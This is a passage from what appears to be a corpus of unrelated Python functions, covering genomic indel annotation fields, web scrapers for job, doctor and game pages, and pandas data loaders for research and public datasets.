\"Indel annotation formatted as \"\n \"GeneSymbol|RefSeqAccession|CodonPos|IndelEffect\"\n \"Delimited by comma for multiple isoforms\",\n },\n \"COSMIC_CNT\": {\n \"COLUMN\": [\"cosmic_cnt\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"COSMIC count in v89\",\n },\n \"MAXMAF\": {\n \"COLUMN\": [\"max_maf\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Maximum minor allele frequency (MAF) \"\n \"reported in dbSNP, ClinVar and gnomAD non-cancer population\",\n },\n \"COMMON\": {\n \"COLUMN\": [\"is_common\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Common in dbSNP or MAXMAF > 0.01\",\n },\n \"CLIN\": {\n \"COLUMN\": [\"clin_info\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"ClinVar annotation formatted as ClinicalSignificance|Condition\",\n },\n \"ICP\": {\n \"COLUMN\": [\"indel_complexity\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Indel complexity: mismatches around the indel measured by edit distance\",\n },\n \"DSM\": {\n \"COLUMN\": [\"dissimilarity\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Dissimilarity: edit distance between indel and flanking sequences\",\n },\n \"ISZ\": {\n \"COLUMN\": [\"indel_size\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Indel size\",\n },\n \"REP\": {\n \"COLUMN\": [\"repeat\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Repeat: count of the indel-sequence repeats in flanking region\",\n },\n \"UQM\": {\n \"COLUMN\": [\"is_uniq_mapped\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Supported by uniquely mapped reads\",\n },\n \"NEB\": {\n \"COLUMN\": [\"is_near_boundary\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Near exon boundary\",\n },\n \"EQX\": {\n \"COLUMN\": [\"equivalence_exists\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Equivalent alignments exist for the indel\",\n },\n \"BID\": {\n \"COLUMN\": [\"is_bidirectional\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Supported by forward and reverse reads\",\n },\n \"MTA\": {\n \"COLUMN\": [\"is_multiallelic\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Multialleleic\",\n },\n \"FRM\": {\n \"COLUMN\": [\"is_inframe\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"In-frame indel\",\n },\n \"SPL\": {\n \"COLUMN\": [\"is_splice\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Located in splice region\",\n },\n \"TRN\": {\n \"COLUMN\": [\"is_truncating\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Truncating indel\",\n },\n \"CDD\": {\n \"COLUMN\": [\"is_in_cdd\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Located in conserved domain\",\n },\n \"LOC\": {\n \"COLUMN\": [\"indel_location\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Relative indel location within the transcript coding region\",\n },\n \"NMD\": {\n \"COLUMN\": [\"is_nmd_insensitive\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Insensitive to nonsense mediated decay\",\n },\n \"IPG\": {\n \"COLUMN\": [\"ipg\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Indels per gene\",\n },\n \"LEN\": {\n \"COLUMN\": [\"cds_length\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Coding sequence length. 
Median value if multiple isoforms exist\",\n },\n \"LC\": {\n \"COLUMN\": [\"lc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Linguistic complexity: diversity of k-mers in flanking 50-bp region\",\n },\n \"LLC\": {\n \"COLUMN\": [\"local_lc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local linguistic complexity: diversity of k-mers in flanking 6-bp region\",\n },\n \"GC\": {\n \"COLUMN\": [\"gc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"GC-content in flanking 50-bp region\",\n },\n \"LGC\": {\n \"COLUMN\": [\"local_gc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local GC-content in flanking 6-bp region\",\n },\n \"SG\": {\n \"COLUMN\": [\"strength\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"DNA bond strength of 2-mers in flanking 50-bp region\",\n },\n \"LSG\": {\n \"COLUMN\": [\"local_strength\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local DNA bond strength of 2-mers in flanking 6-bp region\",\n },\n \"INS\": {\n \"COLUMN\": [\"is_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Insertion\",\n },\n \"ATI\": {\n \"COLUMN\": [\"is_at_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single insertion of A or T\",\n },\n \"ATD\": {\n \"COLUMN\": [\"is_at_del\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single deletion of A or T\",\n },\n \"GCI\": {\n \"COLUMN\": [\"is_gc_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single insertion of G or C\",\n },\n \"GCD\": {\n \"COLUMN\": [\"is_gc_del\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single deletion of G or C\",\n },\n \"ALTC\": {\n \"COLUMN\": [\"alt_count\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Alt count: count of unique reads supporting ALT allele\",\n },\n \"REFC\": {\n \"COLUMN\": [\"ref_count\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Ref count: count of unique reads supporting REF allele\",\n },\n \"RCF\": {\n \"COLUMN\": [\"reclassified\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Reclassification applied\",\n },\n \"RQB\": {\n \"COLUMN\": [\"filtered\", \"rescued\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"Indel used to rescue this entry formatted as CHROM:POS:REF:ALT\",\n },\n }\n\n return d", "def job_data(driver):\n job_info = {\n \"job_title\" : \"h1.title\",\n \"company\" : \"span.company\",\n \"location\" : \"h3.location\",\n \"employment_type\" : \"div.employment div.content div.rich-text\",\n \"industry\" : \"div.industry div.content div.rich-text\",\n \"experience\" : \"div.experience div.content div.rich-text\",\n \"job_function\" : \"div.function div.content div.rich-text\",\n \"description\" : \"div.summary div.content div.description-section div.rich-text\"\n }\n # click the 'read more' button to reveal more about the job posting\n try:\n driver.find_element_by_css_selector(\"button#job-details-reveal\").click()\n except Exception as e:\n print(\"error in attempting to click 'reveal details' button\")\n print(e)\n for key, selector in job_info.items():\n try:\n job_info[key] = driver.find_element_by_css_selector(selector).text\n except Exception as e:\n job_info[key] = \"\"\n pass\n return job_info", "def get_infos(self):\n infos = dict()\n infos['dataset'] = self._dataset_name()\n infos['task'] = self.task\n if self.task == 'sep_clean':\n data_license 
= [librispeech_license]\n else:\n data_license = [librispeech_license, wham_noise_license]\n infos['licenses'] = data_license\n return infos", "def get_data(self):\n\n all_data = OrderedDict()\n projects = [Path(proj) for proj in glob(str(self.data_path.joinpath(\"*\"))) if Path(proj).is_dir()]\n\n for project in projects:\n files = []\n \n # Read all csv files and save them as a list in files\n for ver in glob(str(project.joinpath(\"*.csv\"))):\n files.extend(pd.read_csv(ver, usecols=['time', 'buggy']).values.tolist())\n \n # Create a pandas dataframe from the csv sorted by datetime\n df = pd.DataFrame(files, columns=['Time', 'Bugs']).sort_values(by='Time').reset_index(drop=True)\n \n # Convert time to Pandas DateTime format\n df['Time'] = pd.to_datetime(df['Time']) \n \n # Group bug counts by week starting on monday\n df = df.reset_index().set_index('Time').groupby(\n [pd.Grouper(freq='W-MON')])[\"Bugs\"].sum().astype(int).reset_index()\n \n df = df.set_index('Time')\n # Save the data to dictionary\n all_data.update(OrderedDict({project.name: df}))\n\n return all_data", "def get_doctor_info(url, html):\n \n # create a dictionary to save data\n doctor_info = {}\n \n # parsed html by using lxml\n # In the following processing\n # the one ending in org is the raw data in the HTML\n # the one ending in inf is the processed data by extracting from raw data\n select = etree.HTML(html)\n \n # part 1: get basic information about your doctor\n # attribute: Name, Title, Hospital, Department\n name_org = select.xpath('//div[@class=\"profile-text\"]//h1[@class=\"doctor-name\"]//text()')\n name_inf = name_org[0].strip()\n \n title_org = select.xpath('//div[@class=\"profile-text\"]//span[@class=\"positon\"]//text()')\n title_inf = [i.strip() for i in title_org if len(i.strip()) > 0]\n title_inf = ' '.join(title_inf)\n \n hospital_department_org = select.xpath('//div[@class=\"profile-text\"]//p[@class=\"doctor-faculty\"]//text()')\n hospital_department_inf = [i.strip() for i in hospital_department_org if len(i.strip()) > 0]\n hospital_inf = hospital_department_inf[0]\n department_inf = hospital_department_inf[1]\n \n doctor_info['姓名'] = name_inf\n doctor_info['职称'] = title_inf\n doctor_info['医院'] = hospital_inf\n doctor_info['科室'] = department_inf\n \n # part2: get header format data\n org = select.xpath('//div[@class=\"profile-sta\"]//text()')\n inf = [i.strip() for i in org if len(i.strip()) > 0 and i.strip() != '%']\n for i in range(len(inf)//2):\n doctor_info[inf[2*i]] = inf[2*i + 1]\n \n \n # part3: get sidebar format data\n org_1 = select.xpath('//div[@class=\"item-body\"]//div[@class=\"clearfix\"]//div[@class=\"per-sta-label\"]//text()')\n org_2 = select.xpath('//div[@class=\"item-body\"]//div[@class=\"clearfix\"]//div[@class=\"per-sta-data\"]//text()')\n for i in range(len(org_1)):\n doctor_info[org_1[i][:-1]] = org_2[i]\n \n # part4: get body format data\n honour_org = select.xpath('//div[@class=\"honour-header\"]//text()')\n honour_inf = ''.join([i.strip() for i in honour_org])\n \n honour_detail_org = select.xpath('//li[@class=\"honour-title\"]//text()')\n honour_detail_inf = [i.strip()[:4] for i in honour_detail_org if len(i.strip()) > 0]\n honour_detail_inf = ' '.join(honour_detail_inf)\n \n satisfaction_org = select.xpath('//div[@class=\"item-body\"]//div[@class=\"satisfaction clearfix\"]//i[@class=\"sta-num\"]//text()')\n satisfaction_inf = [i.strip() for i in satisfaction_org if len(i.strip()) > 0 and i.strip() != '%']\n \n resume_org = 
select.xpath('//div[@class=\"good-at-text\"]//text()')\n resume_inf = [i.strip() for i in resume_org]\n if len(resume_inf) <= 20:\n resume_inf = ''.join(resume_inf)\n resume_inf = ''.join(resume_inf[:20])\n \n star_org = select.xpath('//div[@class=\"experience-row clearfix\"]//span[@class=\"experience-label\"]//text()')\n star_inf = 1 if len(star_org) >= 1 else 0\n\n doctor_info['好大夫届数'] = honour_inf\n doctor_info['好大夫具体年份'] = honour_detail_inf\n doctor_info['简历'] = resume_inf \n doctor_info['诊后服务星'] = star_inf\n try:\n doctor_info['疗效满意度'] = satisfaction_inf[0]\n doctor_info['态度满意度'] = satisfaction_inf[1]\n except:\n pass\n \n # part5: personal url\n personal_url = url\n doctor_info['医生个人链接'] = personal_url\n \n return doctor_info", "def get_data(self):\n\n # Import json data into a pandas dataframe\n df = pd.read_json(\"./nutrients.json\", lines=True)\n\n return df", "def _gather_deep_data(self):\n\n cleaned_data_from_website = list()\n\n for i, search_result in self.data_from_website.iterrows():\n cleaned_data_from_website.append(self._deep_data(search_result.url))\n\n cleaned_data_from_website = pd.DataFrame(cleaned_data_from_website)\n if len(cleaned_data_from_website) == 0:\n cleaned_data_from_website['@id'] = '0'\n cleaned_data_from_website.set_index('@id', inplace=True)\n self.data_from_website = cleaned_data_from_website", "def get_infos(self):\n infos = dict()\n infos[\"dataset\"] = self.dataset_name\n infos[\"task\"] = \"separate_noisy\"\n infos[\"licenses\"] = [librispeech_license, tac_license]\n return infos", "def _91_render_plant_data_to_projects(records, **params):\n for plant_record in [record for record in records if record[\"Type\"] == \"Plant\"]:\n key = (plant_record[\"Power Plant Name\"], plant_record[\"Project Name\"])\n project_records = [\n record\n for record in records\n if record[\"Type\"] == \"Project\"\n and record[\"Power Plant Name\"] == plant_record[\"Power Plant Name\"]\n ]\n if len(project_records) == 0:\n log.error(\"NO PROJECT RECORDS FOR %s\" % (key,))\n for project_record in project_records:\n for field in plant_record.keys():\n if project_record.get(field) in [None, '']:\n project_record[field] = plant_record[field]\n return records", "def queryFlywheel(project):\n\n # Create info dict with entries for each subject.\n info = dict()\n\n # Loop through subjects in project\n #for sub in subjects:\n for sub in project.subjects():\n\n # Loop through sessions in subject\n for ses in sub.sessions():\n ses = ses.reload()\n\n # Loop through acquisitions in session\n for acq in ses.acquisitions():\n acq = acq.reload()\n\n # Loop through files in acquisition\n for f in acq.files:\n \n # Skip over non-nifti files\n if f.type != 'nifti':\n next\n\n # Get Flywheel fileId to use as unique identifier\n fileId = f.id\n\n # Try to get timestamp (sometimes DateTime field isn't present.) \n try:\n timestamp = f.info['AcquisitionDateTime']\n except KeyError:\n try:\n timestamp = f.info['AcquisitionDate']\n # Set to None if field isn't present\n except:\n timestamp = pd.NaT\n \n # Try to get series number (sometimes field isn't present.) 
\n try:\n seriesNum = f.info['SeriesNumber']\n # Set to None if field isn't present\n except:\n np.NaN \n # Add the folowing metadata to study info dict:\n # fileID: [subId, sesId, acqLabel, fileName, seriesNum, timestamp]\n info[fileId] = [sub.label, ses.label, acq.label, f.name, seriesNum, timestamp]\n \n # Return project info dict\n return info", "def get_org_projects_info(org_link):\n response = get_response(org_link)\n if response.ok:\n soup = BeautifulSoup(response.text, 'html.parser')\n projects_li = soup.find_all(\n 'li', attrs={'layout': True}\n )\n project_info = []\n for proj_html in projects_li:\n proj_info = {}\n proj_title = proj_html.get('aria-label').replace('\\n', '')\n proj_desc = proj_html.find(\n 'div', attrs={'class': 'archive-project-card__content'}).text.replace('\\t', '')\n proj_relative_link = proj_html.select('a')[0].get('href')\n proj_full_link = HOME_PAGE + proj_relative_link\n proj_info['title'] = proj_title\n proj_info['description'] = proj_desc\n proj_info['link'] = proj_full_link\n project_info.append(proj_info)\n return project_info", "def extract_data(self, root, path, tag):\n data = []\n element = root.xpath(path)\n if element:\n url = self.PODEROPEDIA_BASE_URL + element[0].get('data-w2p_remote', None)\n if url:\n self.logger.debug('Querying {} from {}'.format(tag, url))\n try:\n response = self.session.get(url)\n response.raise_for_status()\n content = response.content\n html_tree = etree.HTML(content, parser=self.parser)\n if html_tree is None:\n return data\n rows = html_tree.xpath('.//*[starts-with(@id, \"collapse\")]/div/table/tr')\n for row in rows:\n target = target_name = target_path = relationship = None\n when = where = where_name = where_path = source = None\n row_id = row.get('id', '')\n cells = row.getchildren()\n idx = 0\n while idx < len(cells) - 1:\n try:\n cell_text = text_strip(cells[idx])\n except AttributeError:\n cell_text = ''\n sources = cells[idx].xpath('.//*[@class=\"fuente\"]')\n if len(sources) > 0:\n source = process_sources(cells[idx])\n elif cell_text == 'es' or cell_text == 'fue':\n when = cell_text\n idx = idx - 1\n target = cells[idx].find('a')\n if target is not None:\n target_path = target.get('href', None)\n target_name = text_strip(target)\n idx = idx + 2\n relationship = text_strip(cells[idx])\n elif cell_text == 'a' or cell_text == 'de':\n idx = idx - 1\n relationship = text_strip(cells[idx])\n idx = idx + 2\n target = cells[idx].find('a')\n if target is not None:\n target_path = target.get('href', None)\n target_name = text_strip(target)\n elif cell_text.startswith('desde'):\n when = cell_text\n elif 'es pasado' in cell_text:\n when = cell_text\n else:\n try:\n ignore = int(cell_text)\n when = cell_text\n except ValueError:\n potential_date = cell_text.split(' ')[0]\n try:\n ignore = datetime.strptime(potential_date, '%d-%m-%Y')\n when = cell_text\n except ValueError:\n try:\n ignore = datetime.strptime(potential_date, '%m-%Y')\n when = cell_text\n except ValueError:\n pass\n idx = idx + 1\n entry = {\n 'type': tag,\n 'target_path': target_path,\n 'relationship': relationship,\n 'when': when,\n 'where': where,\n 'source': source\n }\n data.append(entry)\n self.logger.debug('{}: {}'.format(tag, entry))\n except (requests.exceptions.HTTPError, etree.ParserError):\n self.logger.info('Something bad happened', exc_info=True)\n return data", "def getMonthlyPRinfo(df):\n\n new_df = df.filter(['Merged_YM', 'node.title', 'node.url'], axis=1)\n new_df.groupby('Merged_YM')\n new_df.to_csv('PR_Info_Monthly.csv', index=False)", 
"def fetch_game_info(df: pd.DataFrame) -> pd.DataFrame:\n data_dict = defaultdict(list)\n len = df.shape[0]\n\n with alive_bar(len) as bar:\n for _, row in df.iterrows():\n gid = row['id']\n\n html = fetch_url(TWITCH_TRCK_URL + 'games/' + gid, hint='game')\n divs = html.find_all('div', {'class': 'g-x-s-block'})\n for div in divs:\n # Give a initial value as None\n # so that the program won't raise exception for length\n val, label = (None, None)\n val = div.find('div', {'class': 'g-x-s-value'}).text.strip()\n label = div.find('div', {'class': 'g-x-s-label'}).text.strip()\n if ('@' in label):\n (label, date) = label.split('@')\n label = label.strip()\n val += date\n data_dict[label].append(val)\n\n bar()\n\n df = df.assign(**data_dict)\n return df", "def set_data(self):\n data = [\n {\"ASN1P-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"ASN1P\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n {\"asn1rt-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"asn1rt\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n {\"cadessignature-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"cadessignature\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n { \"JCP-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"JCP\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }},\n { \"JCPRequest-1.0.jar\": {\n \"groupId\": \"ru.lanit.jcp\",\n \"artifactId\": \"JCPRequest\",\n \"version\": \"1.0\",\n \"packaging\": \"jar\"\n }}\n ]\n return data", "def print_info(self):\n\n n_metabolites = len(self.metabolites)\n n_reactions = len(self.reactions)\n n_constraints = len(self.constraints)\n n_variables = len(self.variables)\n\n info = pd.DataFrame(columns=['value'])\n info.loc['name'] = self.name\n info.loc['description'] = self.description\n info.loc['num constraints'] = n_constraints\n info.loc['num variables'] = n_variables\n info.loc['num metabolites'] = n_metabolites\n info.loc['num reactions'] = n_reactions\n info.index.name = 'key'\n\n print(info)", "def attach_data(df: pd.DataFrame) -> pd.DataFrame:\n # load in parties and constituents data\n # if data is missing ask if scraping is wanted to be performed\n\n with open(os.path.join(instancepath, f\"parties.json\"), \"r\", encoding='utf-8') as json_file:\n parties = json.load(json_file)\n with open(os.path.join(instancepath, f\"constituencies.json\"), \"r\", encoding='utf-8') as json_file:\n constituencies = json.load(json_file)\n \n\n \"\"\" #tätä glob hommaa en saanu toimiin, käy for loopin sisäl vaan yhen kerran ja hakee vaan yhden tiedoston\n # load the scraped data to its own data frame\n df_scraped = pd.DataFrame(columns=['first_name', 'last_name', 'election_number', 'image', 'election_promise_1', 'party', 'constituency'])\n i = 1\n with suppress(KeyError,FileNotFoundError):\n for filename in glob(f\"{instancepath}/candidate*.json\"):\n print(\"jee\")\n with open(filename, \"r\", encoding='utf-8') as json_file:\n candidate = json.load(json_file)\n party_name = None\n constituency_name = None\n for part in parties:\n if part['id'] == candidate[\"party_id\"]:\n party_name = part['name_fi']\n\n for consti in constituencies:\n if consti['id'] == candidate[\"constituency_id\"]:\n constituency_name = consti['name_fi']\n\n df_scraped = df_scraped.append({'first_name': candidate['first_name'], \n 'last_name': candidate['last_name'], \n 'election_number': candidate['election_number'], \n 'image': candidate['image'], \n 'election_promise_1': 
candidate['info']['election_promise_1'],\n 'party': party_name,\n 'constituency': constituency_name}, \n ignore_index = True)\n #except (FileNotFoundError, KeyError):\n \"\"\"\n\n # load the scraped data to its own data frame\n df_scraped = pd.DataFrame(columns=['first_name', 'last_name', 'election_number', 'image', 'election_promise_1', 'party', 'constituency'])\n i = 1\n while i <= 3000: # files are named arfter candidate ids and ids range is between 1 and 3000\n with suppress(KeyError,FileNotFoundError):\n with open(os.path.join(instancepath, f\"candidate\" + str(i) + \".json\"), \"r\", encoding='utf-8') as json_file:\n candidate = json.load(json_file)\n party_name = None\n constituency_name = None\n for part in parties:\n if part['id'] == candidate[\"party_id\"]:\n party_name = part['name_fi']\n\n for consti in constituencies:\n if consti['id'] == candidate[\"constituency_id\"]:\n constituency_name = consti['name_fi']\n\n df_scraped = df_scraped.append({\n 'first_name': candidate['first_name'].strip(), \n 'last_name': candidate['last_name'].strip(), \n 'election_number': candidate['election_number'], \n 'image': candidate['image'], \n 'election_promise_1': candidate['info']['election_promise_1'],\n 'party': party_name.strip(),\n 'constituency': constituency_name}, \n ignore_index = True)\n i += 1\n\n\n # loading in data of each individual constituent\n # the ids range from 1 to 14\n j = 1\n constituentArray = []\n constituentArray.append(\"\")\n while j <= 14:\n try:\n with open(os.path.join(instancepath, f'constituent' + str(j) + '.json'), \"r\", encoding='utf-8') as json_file:\n constituentArray.append(json.load(json_file))\n except FileNotFoundError:\n constituentArray.append(\"\")\n j += 1\n\n for i, row in df.iterrows():\n promise = row['Mitkä ovat kolme vaalilupaustasi? 
Vaalilupaus 1:']\n constituency = row['constituency']\n party = row['party']\n df = search_andsetvalues(promise, constituency, party, df, i, df_scraped)\n return df", "def _fetch_poverty_data(year=None):\n global _SIMPLECOUNT_COLUMNS\n\n try:\n if year is None:\n year = _get_max_year([30, 31]) + 1\n ext = 'txt' if year > 2003 else 'dat'\n url = f'https://www2.census.gov/programs-surveys/saipe/datasets/{year}/{year}-state-and-county/est{str(year)[2:]}-il.{ext}'\n\n raw = pd.read_table(url, header=None, skiprows=1, names=['raw'])\n pattern = '.{3}(?P<fips>.{3}).(?P<all>.{8}).{34}(?P<minor>.{8}).*'\n \n filtered = raw['raw'].str.extract(pattern)\n filtered['year'] = year\n filtered['fips'] = filtered['fips'].astype(int) + 1 / 2\n filtered.columns = ['fk_simplecount_county', '1200', '1201', 'year']\n\n pivoted = pd.melt(\n filtered.astype(int),\n id_vars = ['fk_simplecount_county', 'year'],\n value_vars=['1200', '1201'],\n var_name = 'fk_simplecount_indicator'\n )\n\n return pivoted[_SIMPLECOUNT_COLUMNS]\n except HTTPError as e:\n if e.code == 404:\n raise ValueError(\"WARNING: Poverty data is up to date.\")\n except:\n raise", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def filter_page_data(self, document_data: dict) -> dict:\n name = (\n document_data[\"project\"][\"name\"]\n )\n short_description = (\n document_data[\"project\"][\"shortDescription\"]\n )\n created = (\n document_data[\"project\"][\"created\"]\n )\n # due_date = (\n # document_data[\"project\"][\"dueDate\"]\n # )\n changeset_comment = (\n document_data[\"project\"][\"changesetComment\"]\n )\n instructions = (\n document_data[\"project\"][\"externalSource\"][\"instructions\"]\n )\n per_task_instructions = (\n document_data[\"project\"][\"externalSource\"][\"perTaskInstructions\"]\n )\n imagery = (\n document_data[\"project\"][\"externalSource\"][\"imagery\"]\n )\n license = (\n document_data[\"project\"][\"externalSource\"][\"license\"]\n )\n url = (\n document_data[\"project\"][\"url\"]\n )\n # metrics = (\n # document_data[\"platform\"][\"metrics\"]\n # )\n # quality_assurance = (\n # document_data[\"platform\"][\"qualityAssurance\"]\n # )\n users = (\n document_data[\"project\"][\"users\"]\n )\n project_page_data = {\n \"project\": {\n \"name\": name,\n \"shortDescription\": short_description,\n \"created\": created,\n # \"due_date\": due_date,\n \"changesetComment\": changeset_comment,\n \"externalSource\": {\n \"instructions\": instructions,\n \"perTaskInstructions\": per_task_instructions,\n \"imagery\": imagery,\n \"license\": license\n },\n \"url\": url,\n \"users\": users\n }\n # \"metrics\": metrics,\n # \"quality_assurance\": quality_assurance,\n }\n return project_page_data", "def extract_data():\n client = MongoClient(HOST, PORT)\n collection = client[DB][COLLECTION]\n df = pd.DataFrame(collection.find().limit(10))\n return df", "def subjectinfo(subject_id):\n import pandas as pd\n from nipype.interfaces.base import Bunch\n \n def construct_sj(trialinfo, subject_id, run_num, cond_name):\n \"\"\"construct df\"\"\"\n df_sj = trialinfo[(trialinfo['subject']==int(subject_id)) & (trialinfo['session']==int(run_num))]\n sj_info = pd.DataFrame()\n sj_info['onset'] = df_sj['runtime']\n sj_info['duration'] = 0.\n sj_info['weight'] 
= 1.\n trial_type = df_sj['seq'].replace({1:'Low', 2:'High'})\n sj_info['trial_type'] = trial_type\n sj_info_cond = sj_info[sj_info['trial_type']==cond_name]\n return sj_info_cond\n\n def select_confounds(subject_id, run_num):\n \"\"\"import confounds tsv files\"\"\"\n confounds_dir = f'/data/sub-%02d/func/' % int(subject_id)\n confounds_file = confounds_dir+f'sub-%02d_task-tsl_run-%d_desc-confounds_timeseries.tsv' % (int(subject_id), int(run_num))\n conf_df = pd.read_csv(confounds_file, sep='\\t')\n return conf_df\n\n def confounds_regressor(conf_df, conf_names):\n \"\"\"select confounds for regressors\"\"\"\n conf_select = conf_df[conf_names].loc[4:].fillna(0) # ignore first 4 dummy scans\n conf_select_list = [conf_select[col].values.tolist() for col in conf_select] \n return conf_select_list\n\n def find_runs(subject_id):\n \"\"\"find available runs from func\"\"\"\n from glob import glob\n func_dir = f'/output/smooth_nomask/preproc/sub-%02d/' % int(subject_id) \n func_files = glob(func_dir+'*bold.nii')\n runs = []\n for f in func_files:\n tmp = f.split('/')\n run = tmp[5].split('_')[2].split('-')[1]\n runs.append(int(run))\n return sorted(runs)\n \n conf_names = ['csf','white_matter','global_signal',\n 'dvars','std_dvars','framewise_displacement', 'rmsd',\n 'a_comp_cor_00', 'a_comp_cor_01', 'a_comp_cor_02', 'a_comp_cor_03', 'a_comp_cor_04', 'a_comp_cor_05', 'cosine00', 'cosine01', 'cosine02', 'cosine03', 'cosine04', 'cosine05',\n 'trans_x', 'trans_y', 'trans_z', 'rot_x','rot_y','rot_z']\n\n alltrialinfo = pd.read_csv('/code/data/fmri_behavioural_new.csv')\n alltrialinfo.head()\n \n subject_info = []\n onset_list = []\n condition_names = ['High', 'Low']\n runs = find_runs(subject_id)\n print(runs)\n for run in runs:\n for cond in condition_names:\n run_cond = construct_sj(alltrialinfo, subject_id, run, cond)\n onset_run_cond = run_cond['onset'].values\n onset_list.append(sorted(onset_run_cond))\n\n subject_info = []\n for r in range(len(runs)):\n onsets = [onset_list[r*2], onset_list[r*2+1]]\n regressors_all = select_confounds(subject_id, runs[r])\n regressors = confounds_regressor(regressors_all, conf_names)\n\n subject_info.insert(r,\n Bunch(conditions=condition_names,\n onsets=onsets,\n durations=[[0], [0]],\n regressors=regressors,\n regressor_names=conf_names,\n amplitudes=None,\n tmod=None,\n pmod=None))\n\n return subject_info # this output will later be returned to infosource", "def getStudyInfo(self, study_id, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_study_info', [study_id, web_app_user_id, results])\n study_info = {}\n for row in results:\n study_info['submit_to_insdc'] = row[0]\n study_info['investigation_type'] = row[1]\n study_info['project_name'] = row[2]\n study_info['experimental_factor'] = row[3]\n study_info['study_alias'] = row[4]\n study_info['study_title'] = row[5]\n study_info['study_type'] = row[6]\n study_info['study_abstract'] = row[7]\n study_info['study_description'] = row[8]\n study_info['center_name'] = row[9]\n study_info['center_project_name'] = row[10]\n study_info['project_id'] = row[11]\n study_info['pmid'] = row[12]\n study_info['metadata_complete'] = row[13]\n study_info['sff_complete'] = row[14]\n study_info['mapping_file_complete'] = row[15]\n study_info['miens_compliant'] = row[16]\n study_info['can_delete'] = row[17]\n study_info['avg_emp_score'] = row[18]\n study_info['user_emp_score'] = row[19]\n study_info['number_samples_promised'] = row[20]\n 
study_info['number_samples_collected'] = row[21]\n study_info['principal_investigator'] = row[22]\n study_info['sample_count'] = row[23] \n study_info['lab_person'] = row[24] \n study_info['lab_person_contact'] = row[25]\n study_info['emp_person'] = row[26]\n study_info['first_contact'] = row[27]\n study_info['most_recent_contact'] = row[28]\n study_info['sample_type'] = row[29]\n study_info['has_physical_specimen'] = row[30]\n study_info['has_extracted_data'] = row[31]\n study_info['timeseries'] = row[32]\n study_info['spatial_series'] = row[33]\n study_info['principal_investigator'] = row[34]\n study_info['principal_investigator_contact'] = row[35]\n study_info['default_emp_status'] = row[36]\n study_info['funding'] = row[37]\n study_info['includes_timeseries'] = row[38]\n study_info['sample_count'] = row[39]\n study_info['ebi_study_accession'] = row[40]\n study_info['locked'] = row[41]\n study_info['vamps_id'] = row[42]\n return study_info", "def get_projects(session):\n cursuses = [1, 21] # cursus ids from which to get the projects\n project_names = []\n\n for cursus in cursuses:\n # Get all the projects from 1 cursus, very slow process because projects endpoint contains\n # a lot of information\n projects = get_all_pages(session, f'/cursus/{cursus}/projects', 100, {'filter[exam]': False})\n for project in projects:\n # Create dictionary containing project id and project name ans set in bigger dict\n project_names.append({'id': project['id'], 'name': project['name']})\n\n return project_names", "def download_potholes():\n\n\tlink = \"https://data.cityofchicago.org/api/views/7as2-ds3y/rows.csv?accessType=DOWNLOAD\"\n\tdf = pd.read_csv(link)\n\tdf = df[(df.STATUS == 